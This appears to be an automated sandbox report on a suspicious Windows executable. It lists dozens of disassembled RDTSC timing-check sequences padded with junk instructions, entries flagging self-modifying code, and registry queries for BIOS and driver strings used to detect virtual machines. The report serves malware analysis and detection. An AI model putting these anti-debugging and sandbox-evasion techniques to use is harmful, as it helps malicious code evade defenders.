Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 72E06B0 second address: 72E06B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 72E0AEF second address: 72E0AF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 72E0AF5 second address: 72E0AFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 72E0AFB second address: 72E0AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7330A32 second address: 7330A80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 jmp 00007FAAAD0E3C63h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FAAAD0E3C66h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FAAAD0E3C67h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7330A80 second address: 7330ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ACh 0x00000005 pushfd 0x00000006 jmp 00007FAAACBBF200h 0x0000000b or si, E9C8h 0x00000010 jmp 00007FAAACBBF1FBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007FAAACBBF1FBh 0x00000022 push eax 0x00000023 pop edi 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7330ABC second address: 7330AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310068 second address: 73100C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 pushad 0x00000009 mov di, cx 0x0000000c pushfd 0x0000000d jmp 00007FAAACBBF1FAh 0x00000012 add cx, DCC8h 0x00000017 jmp 00007FAAACBBF1FBh 0x0000001c popfd 0x0000001d popad 0x0000001e and esp, FFFFFFF0h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FAAACBBF1FBh 0x0000002a or ecx, 05B9CB0Eh 0x00000030 jmp 00007FAAACBBF209h 0x00000035 popfd 0x00000036 movzx ecx, bx 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73100C7 second address: 73100CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73100CD second address: 73100D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73100D1 second address: 73100FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 44h 0x0000000e pushad 0x0000000f mov esi, 18083ECDh 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73100FC second address: 7310100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310100 second address: 7310104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310104 second address: 731010A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 731010A second address: 731016E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAD0E3C66h 0x00000009 and ch, 00000048h 0x0000000c jmp 00007FAAAD0E3C5Bh 0x00000011 popfd 0x00000012 mov bx, si 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], ebx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FAAAD0E3C60h 0x00000022 sub al, FFFFFFA8h 0x00000025 jmp 00007FAAAD0E3C5Bh 0x0000002a popfd 0x0000002b mov edx, eax 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov edi, 719F29A2h 0x00000037 mov di, 3DEEh 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 731016E second address: 7310198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAACBBF1FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310198 second address: 73101AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73101AD second address: 7310245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 7EE84862h 0x00000008 pushfd 0x00000009 jmp 00007FAAACBBF203h 0x0000000e sbb al, 0000005Eh 0x00000011 jmp 00007FAAACBBF209h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c jmp 00007FAAACBBF1FCh 0x00000021 pushfd 0x00000022 jmp 00007FAAACBBF202h 0x00000027 or si, E488h 0x0000002c jmp 00007FAAACBBF1FBh 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, edi 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushfd 0x00000038 jmp 00007FAAACBBF202h 0x0000003d and ecx, 54AC46E8h 0x00000043 jmp 00007FAAACBBF1FBh 0x00000048 popfd 0x00000049 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310245 second address: 7310275 instructions: 0x00000000 rdtsc 0x00000002 call 00007FAAAD0E3C68h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAAD0E3C61h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310275 second address: 73102D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f mov dx, B7C0h 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 pushad 0x00000016 mov ax, bx 0x00000019 call 00007FAAACBBF201h 0x0000001e pushfd 0x0000001f jmp 00007FAAACBBF200h 0x00000024 xor ecx, 3A408938h 0x0000002a jmp 00007FAAACBBF1FBh 0x0000002f popfd 0x00000030 pop esi 0x00000031 popad 0x00000032 mov edi, dword ptr [ebp+08h] 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73102D5 second address: 7310308 instructions: 0x00000000 rdtsc 0x00000002 call 00007FAAAD0E3C5Eh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov bh, FFh 0x0000000c popad 0x0000000d mov dword ptr [esp+24h], 00000000h 0x00000015 jmp 00007FAAAD0E3C5Ah 0x0000001a lock bts dword ptr [edi], 00000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov al, bl 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310308 second address: 731030E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 731030E second address: 7310312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310312 second address: 7310331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FAB1CDC130Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAACBBF1FFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310331 second address: 7310357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edx 0x0000000f push ebx 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310357 second address: 73103A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 mov bl, al 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c push edi 0x0000000d pushfd 0x0000000e jmp 00007FAAACBBF1FEh 0x00000013 and esi, 39C9CD18h 0x00000019 jmp 00007FAAACBBF1FBh 0x0000001e popfd 0x0000001f pop esi 0x00000020 mov dh, 86h 0x00000022 popad 0x00000023 pop ebx 0x00000024 jmp 00007FAAACBBF200h 0x00000029 mov esp, ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov edx, 6B7F62BCh 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 734086A second address: 7340870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7340870 second address: 73408A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edx, eax 0x0000000d mov eax, 3582AFFFh 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007FAAACBBF202h 0x0000001a pop ebp 0x0000001b pushad 0x0000001c pushad 0x0000001d push esi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73408A6 second address: 73408B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 mov ax, 74FBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7330916 second address: 733091A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 733091A second address: 7330937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7330937 second address: 7330955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 mov ch, F0h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAACBBF201h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7330955 second address: 7330972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAAD0E3C60h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7330972 second address: 7330978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7330978 second address: 733097C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 733097C second address: 73309AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov dx, DC6Ah 0x0000000f mov edx, 3E465536h 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FAAACBBF208h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7340A90 second address: 7340ABA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov ebx, 36304336h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov dx, si 0x00000012 call 00007FAAAD0E3C66h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7340ABA second address: 7340B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 jmp 00007FAAACBBF207h 0x0000000c mov ebp, esp 0x0000000e jmp 00007FAAACBBF206h 0x00000013 push dword ptr [ebp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FAAACBBF207h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7390E9D second address: 7390EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0416 second address: 73A041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A041C second address: 73A043E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A043E second address: 73A04A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FAAACBBF1FFh 0x0000000b xor eax, 5615DACEh 0x00000011 jmp 00007FAAACBBF209h 0x00000016 popfd 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007FAAACBBF1FEh 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov edi, 586CF360h 0x00000028 call 00007FAAACBBF209h 0x0000002d pop eax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A04A8 second address: 73A04CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FAAAD0E3C5Bh 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A04CF second address: 73A04F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FAAACBBF1FDh 0x00000012 pop eax 0x00000013 mov eax, edi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A04F4 second address: 73A0548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAD0E3C68h 0x00000009 xor si, 2CC8h 0x0000000e jmp 00007FAAAD0E3C5Bh 0x00000013 popfd 0x00000014 mov ebx, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b movsx ebx, si 0x0000001e mov cx, 82D3h 0x00000022 popad 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FAAAD0E3C65h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0548 second address: 73A054E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A054E second address: 73A0552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0552 second address: 73A05F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007FAAACBBF206h 0x00000013 sub ecx, ecx 0x00000015 jmp 00007FAAACBBF201h 0x0000001a xchg eax, edi 0x0000001b pushad 0x0000001c jmp 00007FAAACBBF1FCh 0x00000021 jmp 00007FAAACBBF202h 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FAAACBBF201h 0x0000002f and ecx, 5CF7C366h 0x00000035 jmp 00007FAAACBBF201h 0x0000003a popfd 0x0000003b popad 0x0000003c xchg eax, edi 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov bx, ax 0x00000043 mov eax, 24D0D2A1h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A05F2 second address: 73A0631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 00000001h 0x0000000e jmp 00007FAAAD0E3C66h 0x00000013 lock cmpxchg dword ptr [esi], ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0631 second address: 73A0638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0638 second address: 73A066D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007FAAAD0E3C60h 0x00000010 cmp ecx, 01h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A066D second address: 73A068A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A068A second address: 73A0762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FAB1D255B85h 0x0000000f pushad 0x00000010 pushad 0x00000011 call 00007FAAAD0E3C5Ah 0x00000016 pop ecx 0x00000017 pushfd 0x00000018 jmp 00007FAAAD0E3C5Bh 0x0000001d adc esi, 1AEC697Eh 0x00000023 jmp 00007FAAAD0E3C69h 0x00000028 popfd 0x00000029 popad 0x0000002a push ecx 0x0000002b call 00007FAAAD0E3C67h 0x00000030 pop ecx 0x00000031 pop ebx 0x00000032 popad 0x00000033 pop edi 0x00000034 pushad 0x00000035 mov cx, 36C1h 0x00000039 pushfd 0x0000003a jmp 00007FAAAD0E3C5Eh 0x0000003f and si, 0ED8h 0x00000044 jmp 00007FAAAD0E3C5Bh 0x00000049 popfd 0x0000004a popad 0x0000004b pop esi 0x0000004c pushad 0x0000004d pushad 0x0000004e mov ch, 29h 0x00000050 pushfd 0x00000051 jmp 00007FAAAD0E3C67h 0x00000056 adc eax, 40A9464Eh 0x0000005c jmp 00007FAAAD0E3C69h 0x00000061 popfd 0x00000062 popad 0x00000063 push ecx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0762 second address: 73A0793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FAAACBBF205h 0x00000010 jmp 00007FAAACBBF1FBh 0x00000015 popfd 0x00000016 mov cx, 172Fh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7360B09 second address: 7360B18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7360B18 second address: 7360B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAACBBF1FDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7360B45 second address: 7360BB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAD0E3C67h 0x00000009 adc eax, 5815265Eh 0x0000000f jmp 00007FAAAD0E3C69h 0x00000014 popfd 0x00000015 mov cx, 0727h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FAAAD0E3C66h 0x00000026 and eax, 3390E988h 0x0000002c jmp 00007FAAAD0E3C5Bh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7360BB5 second address: 7360BF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FAAACBBF1FEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FAAACBBF200h 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7360BF6 second address: 7360BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7360BFA second address: 7360C00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7360C00 second address: 7360C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 28h 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FAAAD0E3C69h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAAD0E3C5Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7360C35 second address: 7360C5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAACBBF1FDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7360C5B second address: 7360C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 66h 0x00000005 pushfd 0x00000006 jmp 00007FAAAD0E3C68h 0x0000000b add ch, FFFFFFC8h 0x0000000e jmp 00007FAAAD0E3C5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push 00000000h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov ecx, ebx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73609F3 second address: 73609F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSpecial instruction interceptor: First address: CD0976 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSpecial instruction interceptor: First address: E78B0A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSpecial instruction interceptor: First address: E80631 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSpecial instruction interceptor: First address: F053D1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
